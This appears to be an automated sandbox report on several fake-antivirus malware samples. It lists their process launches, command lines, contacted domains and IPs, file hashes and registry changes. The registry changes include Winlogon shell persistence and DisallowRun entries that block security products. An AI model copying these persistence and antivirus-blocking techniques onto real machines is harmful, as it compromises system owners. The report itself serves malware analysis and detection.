C:\Users\Admin\AppData\Local\Temp\DB.EXE

"C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\Users\Admin\AppData\Local\Temp\EN.EXE

"C:\Users\Admin\AppData\Local\Temp\EN.EXE"

C:\Users\Admin\AppData\Local\Temp\SB.EXE

"C:\Users\Admin\AppData\Local\Temp\SB.EXE"

C:\Windows\SysWOW64\KBDKORC.exe

C:\Windows\SysWOW64\KBDKORC.exe

C:\Windows\SysWOW64\ipconfig.exe

"C:\Windows\system32\ipconfig.exe" /flushdns

C:\Windows\SysWOW64\cmd.exe

/c C:\Users\Admin\AppData\Local\Temp\~unins2362.bat "C:\Users\Admin\AppData\Local\Temp\DB.EXE"

C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe

"C:\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe" "C:\Users\Admin\AppData\Local\Temp\AV2.EXE"

C:\Users\Admin\AppData\Roaming\RtlDriver32.exe

"C:\Users\Admin\AppData\Roaming\RtlDriver32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 middlechrist.com udp
US 8.8.8.8:53 aeravine.com udp
US 66.96.162.135:80 middlechrist.com tcp
US 8.8.8.8:53 imagehut4.cn udp
US 137.175.35.119:80 imagehut4.cn tcp
US 8.8.8.8:53 aeravine.com udp
US 8.8.8.8:53 bemachin.com udp
NL 178.162.174.147:80 178.162.174.147 tcp

Files

\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 f284568010505119f479617a2e7dc189
SHA1 e23707625cce0035e3c1d2255af1ed326583a1ea
SHA256 26c8f13ea8dc17443a9fa005610537cb6700aebaf748e747e9278d504e416eb1
SHA512 ebe96e667dfde547c5a450b97cd7534b977f4073c7f4cbc123a0e00baaefeb3be725c1cafbfb5bb040b3359267954cd1b4e2094ef71fc273732016ee822064bf

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 6be30106ab1a102d1e71454880c03ab5
SHA1 8aa4d38d9b7e5c31508adf94e8a582cff7301066
SHA256 80cd1cb55b51d87f316748e04e600671c6be78be56739b8dac6a483da4623bf6
SHA512 e9d98bdecac318b752718f2b7222973c6eaa79ed9ac836f6ba2cb234fbbeb0f712831be8cf90547b8313ff355c4a20eab304e778c6eca83cde190156014ca686

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

MD5 68fc5382721ce31345378b910e468290
SHA1 8eb5c95adf51dfcddd61ae130cf3d05641dedc4e
SHA256 d8a11a901f9a5a0280e69015d7adb103509af7b03c7b8fd6fbbcd3796140d7cd
SHA512 527dbbaefdc088c473544619467c68c1069af81b61571741379d25168c5b8bc207871a59de1806526c253eb5d1bd0dad335291d885445c83cd4cd5b91eb3f8dd

C:\Users\Admin\AppData\Local\Temp\DB.EXE

MD5 c6746a62feafcb4fca301f606f7101fa
SHA1 e09cd1382f9ceec027083b40e35f5f3d184e485f
SHA256 b5a255d0454853c8afc0b321e1d86dca22c3dbefb88e5d385d2d72f9bc0109e6
SHA512 ee5dfa08c86bf1524666f0851c729970dbf0b397db9595a2bae01516299344edb68123e976592a83e492f2982fafe8d350ba2d41368eb4ecf4e6fe12af8f5642

\Users\Admin\AppData\Local\Temp\DB.EXE

MD5 9ea24c6453476b84947f59fa6286c67a
SHA1 915955825965f38523846f773d983c8085db8530
SHA256 da2f099f5ccef5a576f5c41f17887ab3430834cf4ee621ed578e334662b70e0b
SHA512 f0a4ab2c9032c84c4106493bdfe62659c4caaeb35a4cee85ea8aa2b20d5520b2be071115810f6421a983e4d67df47b58db2f0dd00f11f389ae739ffa5cb77332

C:\Users\Admin\AppData\Local\Temp\AV.EXE

MD5 e1695d64b6dd90ccac31749222fd81d5
SHA1 a8596a81035087de73875bfc5a5edc8b93488d06
SHA256 11338bf7b938c0e52392961e20511c25e05eb82f978da277fc1e46e764170805
SHA512 5092bcc022218c40b4b759dbbac1ba0b2d9cf364d58b8e88905823663c6d9a2a96cced62bcefa8008317cba38945ea929815ed9c463a66824800ffe700c7011c

memory/1280-27-0x0000000000260000-0x00000000002F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\SB.EXE

MD5 9252e1be9776af202d6ad5c093637022
SHA1 6cc686d837cd633d9c2e8bc1eaba5fc364bf71d8
SHA256 ce822ff86e584f15b6abd14c61453bd3b481d4ec3fdeb961787fceb52acd8bd6
SHA512 98b1b3ce4d16d36f738478c6cf41e8f4a57d3a5ecfa8999d45592f79a469d8af8554bf4d5db34cb79cec71ce103f4fde1b41bd3cce30714f803e432e53da71ea

C:\Users\Admin\AppData\Local\Temp\EN.EXE

MD5 621f2279f69686e8547e476b642b6c46
SHA1 66f486cd566f86ab16015fe74f50d4515decce88
SHA256 c17a18cf2c243303b8a6688aad83b3e6e9b727fcd89f69065785ef7f1a2a3e38
SHA512 068402b02f1056b722f21b0a354b038f094d02e4a066b332553cd6b36e3640e8f35aa0499a2b057c566718c3593d3cea6bbabd961e04f0a001fd45d8be8e1c4e

memory/2244-30-0x00000000002C0000-0x0000000000305000-memory.dmp

memory/1280-50-0x0000000000260000-0x00000000002F3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Fake AV\tsa.crt

MD5 6e630504be525e953debd0ce831b9aa0
SHA1 edfa47b3edf98af94954b5b0850286a324608503
SHA256 2563fe2f793f119a1bae5cca6eab9d8c20409aa1f1e0db341c623e1251244ef5
SHA512 bbcf285309a4d5605e19513c77ef077a4c451cbef04e3cbdfec6d15cc157a9800a7ff6f70964b0452ddb939ff50766e887904eda06a9999fdedf5b2e8776ebd2

memory/1280-52-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/1280-53-0x0000000000400000-0x0000000000445000-memory.dmp

memory/1280-63-0x0000000000220000-0x0000000000251000-memory.dmp

memory/2580-64-0x0000000000400000-0x0000000000464000-memory.dmp

memory/2684-65-0x0000000000400000-0x000000000040A000-memory.dmp

memory/2352-66-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-67-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2580-68-0x0000000000290000-0x00000000002F4000-memory.dmp

memory/2580-69-0x000000000029B000-0x000000000029C000-memory.dmp

memory/2352-70-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2580-71-0x0000000000400000-0x0000000000464000-memory.dmp

memory/1280-72-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/1280-73-0x0000000000380000-0x0000000000381000-memory.dmp

\Windows\SysWOW64\KBDKORC.exe

MD5 80a2bdb0db5c5fbc8695c8ded8b30c0a
SHA1 1b211211a9b02ce2986e3613ccdb56d37869abbe
SHA256 de3b58c97f73d98149c756b324f4e5a37fe2ac9beb1609e2abe1f5fef99a0ac1
SHA512 ebffc1222adc50ef3bdfd368da70ecbe4cde09a086392349e5ba4314ad5b5b99c480ca704f5d512b8fd78231503653383ff638563dd7f2302c1cf0761e973be5

C:\Users\Admin\AppData\Local\Temp\~unins2362.bat

MD5 9e0a2f5ab30517809b95a1ff1dd98c53
SHA1 5c1eefdf10e67d1e9216e2e3f5e92352d583c9ce
SHA256 97ac9fee75a1f7b63b3115e9c4fb9dda80b1caba26d2fb51325670dee261fe32
SHA512 e959cc1fd48fb1cccf135a697924c775a3812bab211fc7f9b00c5a9d617261d84c5d6f7cb548774c1e8f46811b06ca39c5603d0e10cbcb7b805f9abbe49b9b42

memory/1280-91-0x0000000000260000-0x00000000002F3000-memory.dmp

memory/2352-92-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-93-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2716-97-0x0000000000230000-0x0000000000233000-memory.dmp

memory/2716-103-0x0000000000240000-0x0000000000241000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AV2

MD5 f05db61496dfb8dc46702da9ac8818ec
SHA1 e6b0e65de5d4a5d1f125eeee32b3107efc3c9bc5
SHA256 d5ef14abeed83be252cfb6205becf53984f3683f8eabc24cbf23451efd210af2
SHA512 5357d258bef37d6f2556e91f88ea3621e120402493aa37286d194968a566eda2332a1febc6abf209a23ab5b82174020f95306cf3b70b293da989bfdeb3e0af03

memory/2716-104-0x0000000000400000-0x00000000004C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AV2.EXE

MD5 014578edb7da99e5ba8dd84f5d26dfd5
SHA1 df56d701165a480e925a153856cbc3ab799c5a04
SHA256 4ce5e8b510895abb204f97e883d8cbaacc29ccef0844d9ae81f8666f234b0529
SHA512 bd5159af96d83fc7528956c5b1bd6f93847db18faa0680c6041f87bbebef5e3ba2de1f185d77ff28b8d7d78ec4f7bd54f48b37a16da39f43314ef022b4a36068

memory/2244-175-0x00000000002C0000-0x0000000000305000-memory.dmp

memory/2352-176-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2352-177-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-181-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2352-182-0x0000000001FE0000-0x0000000002020000-memory.dmp

memory/2716-183-0x0000000000400000-0x00000000004C3000-memory.dmp

\ProgramData\mC17766EgLmO17766\mC17766EgLmO17766.exe

MD5 ba45f719f6a86cde676a9ffc7461b6b8
SHA1 b72e9329577a7f47d6d95eb6efdf694ebbb39824
SHA256 e150c5221cdd7d755eb9b09bcbedeb9e993e5d39c3902ab30752187e564c55e1
SHA512 43abb3f334e813402cb68611f3f575e2822ec951aefc1a721e64f37a267e0d207599921964233abe5ce9452f05217442a85a3e030d30b5f59f3706c6b20e04ed

memory/3068-207-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/3068-222-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/2352-219-0x00000000748B0000-0x0000000074E5B000-memory.dmp

memory/3068-218-0x0000000000A60000-0x0000000000AA0000-memory.dmp

memory/3068-223-0x0000000000A60000-0x0000000000AA0000-memory.dmp

memory/3068-224-0x0000000000A60000-0x0000000000AA0000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:39

Platform

win10v2004-20240226-en

Max time kernel

164s

Max time network

165s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

Signatures

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 732 set thread context of 4880 N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe C:\Windows\SysWOW64\cmd.exe

Modifies registry class

Description Indicator Process Target
Key created \registry\machine\Software\Classes\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Key created \registry\machine\Software\Classes\WOW6432Node\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308} C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{f456cbc2-bfc5-6f65-aca0-986e7eba0308}\u = "3" C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A
N/A N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe N/A
Token: SeDebugPrivilege N/A \??\globalroot\systemroot\system32\usеrinit.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\Antivirus2010.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

\??\globalroot\systemroot\system32\usеrinit.exe

/install

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2972,i,4036376905309803364,5412922217215781933,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 138.91.171.81:80 tcp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 168.156.42.60:80 tcp
US 168.156.42.60:80 tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 45.19.74.20.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 81.171.91.138.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 178.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
N/A 13.107.42.16:443 tcp

Files

memory/732-1-0x0000000000400000-0x00000000004C4400-memory.dmp

memory/732-2-0x00000000006A0000-0x00000000008A0000-memory.dmp

\??\globalroot\systemroot\system32\usеrinit.exe

MD5 4acd14244d2cd76d06939163127cfb10
SHA1 75f3e3c764f7d20c9950f5410f753f3210bcc2e7
SHA256 29b5b65a1cdf119ac7c6c9df76c6843b25a81bd00aa5a5e995ec675e34bf1acb
SHA512 001504da15c1825102479ba379b0be7ec15e779626d450d9d763552d7e1ac71f5bb86110f9361363bd401aabc53cdfd2d554480aec8bef85ed8c7b03cebf4031

memory/732-10-0x0000000000400000-0x00000000004C4400-memory.dmp

\systemroot\system32\mseeeeee.dll

MD5 8736c2a37ff0adf6f03d94bb34d1f784
SHA1 e4867b136e100c9d45f6adea593c9a636134f308
SHA256 dbe318e7c72f9558f836c920510a5245ae5af29996b62f661399ce3724458ec3
SHA512 2bbb22540e6ae0ebdd7c5303f67fb3911025a9f8f68c1c192edf5247a66bff885e292dded093d4522488b9a98f5bb00f24b00374e8eeb219184faacc95818848

Analysis: behavioral14

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:36

Platform

win10v2004-20240226-en

Max time kernel

9s

Max time network

11s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

Signatures

Modifies WinLogon for persistence

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\gog.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "125" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe N/A
N/A N/A C:\Windows\system32\LogonUI.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe

"C:\Users\Admin\AppData\Local\Temp\Fake AV\CleanThis.exe"

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa39bf855 /state1:0x41c64e6d

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
LT 94.244.80.60:80 tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
N/A 104.208.16.89:443 tcp
US 8.8.8.8:53 udp

Files

memory/4684-0-0x0000000000400000-0x000000000057F000-memory.dmp

memory/4684-1-0x0000000002580000-0x0000000002581000-memory.dmp

memory/4684-4-0x0000000000400000-0x000000000057F000-memory.dmp

Analysis: behavioral24

Detonation Overview

Submitted

2024-03-02 22:34

Reported

2024-03-02 22:38

Platform

win10v2004-20240226-en

Max time kernel

150s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe"

Signatures

Checks for common network interception software

evasion

Enumerates VirtualBox registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A

Blocks application from running via registry modification

evasion
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\0 = "msseces.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\2 = "ekrn.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\11 = "avgcfgex.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\ C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\4 = "avgnt.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\6 = "avscan.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\8 = "avgui.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\9 = "avgtray.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\10 = "avgscanx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\13 = "avgchsvx.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\DisallowRun\15 = "avgwdsvc.exe" C:\Users\Admin\AppData\Local\Temp\Fake AV\InternetSecurityGuard.exe N/A
